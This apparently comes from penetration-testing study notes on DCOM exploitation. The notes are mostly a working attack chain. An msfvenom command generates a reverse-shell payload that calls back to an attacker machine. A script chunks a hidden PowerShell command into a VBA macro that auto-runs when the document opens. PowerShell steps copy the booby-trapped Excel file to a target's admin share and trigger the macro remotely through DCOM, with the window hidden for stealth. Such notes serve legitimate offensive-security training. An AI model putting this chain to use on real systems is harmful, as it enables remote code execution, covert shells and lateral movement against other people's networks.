DCOM Exploitation
24.10.1 - Distributed Component Object Model (DCOM)
- DCOM allows a computer to run programs over the network on a different computer e.g. Excel/PowerPoint/Outlook
- Requires RPC port 135 and local admin access to call the DCOM Service Control Manager - the API.
- The
runmethod within DCOM allows us to execute a VBA macro remotely.
DCOM - create payload and VBA macro
(Kali) create rshell payload
msfvenom -p windows/shell_reverse_tcp LHOST=[kali] LPORT=4444 -f hta-psh -o evil.hta
(Python) split payload into smaller chunks
str = "powershell.exe -nop -w hidden -e {base64_encoded_payload}"
n = 50
for i in range(0, len(str), n):
print "Str = Str + " + '"' + str[i:i+n] + '"'
Create VBA macro -> insert into Excel file
Sub AutoOpen()
exploit
End Sub
Sub Document_Open()
exploit
End Sub
Sub exploit()
Dim str As String
{insert_payload_here}
# OPTION 1
Shell (Str)
# OPTION 2
# CreateObject("Wscript.Shell").Run str
End Sub
Check if document contains valid exploit macro
mraptor [exploit.doc]
DCOM - Copy file to remote and execute
Copy Excel file containing VBA payload to target
$LocalPath = "C:\Users\<local_user>\badexcel.xls"
$RemotePath = "\\<target>\C$\Users\<target_user>\badexcel.xls"
[System.IO.File]::Copy($LocalPath, $RemotePath, $true)
Create a remote DCOM object (Excel on the target)
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("Excel.Application", "<target>"))
Make Excel visible (optional, often set to false for stealth)
$com.Visible = $false
Open the Excel file (on remote system, not your local C:)
$workbook = $com.Workbooks.Open("C:\Users\<target_user>\badexcel.xls")
Run macro (if macro is auto-enabled and trusted)
$com.Run("mymacro")